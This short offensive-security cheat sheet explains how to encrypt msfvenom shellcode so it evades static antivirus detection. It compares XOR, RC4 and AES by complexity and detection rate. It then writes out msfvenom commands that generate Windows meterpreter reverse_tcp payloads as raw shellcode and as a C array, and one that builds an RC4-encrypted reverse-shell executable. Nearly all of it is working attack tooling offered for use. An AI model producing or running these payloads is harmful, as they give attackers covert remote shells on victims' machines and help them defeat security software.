Encryption Overview

Two common methods to encrypt msfvenom shellcode to evade static AV detection:

Method	Complexity	Detection Rate
XOR	Low	Medium — simple but effective with random key
RC4	Medium	Lower — stream cipher, harder to signature
AES	High	Lowest — not built-in to msfvenom, implement in loader

Generate base payload for encryption

# Raw shellcode to encrypt externally
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o sc.bin

# C array to paste into encrypt script
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f c

msfvenom built-in encrypted transport

# RC4 encrypted C2 channel (no external encryption needed)
msfvenom -p windows/meterpreter/reverse_tcp_rc4 \
  LHOST=<ip> LPORT=4444 RC4PASSWORD=MyKey -f exe > rc4_shell.exe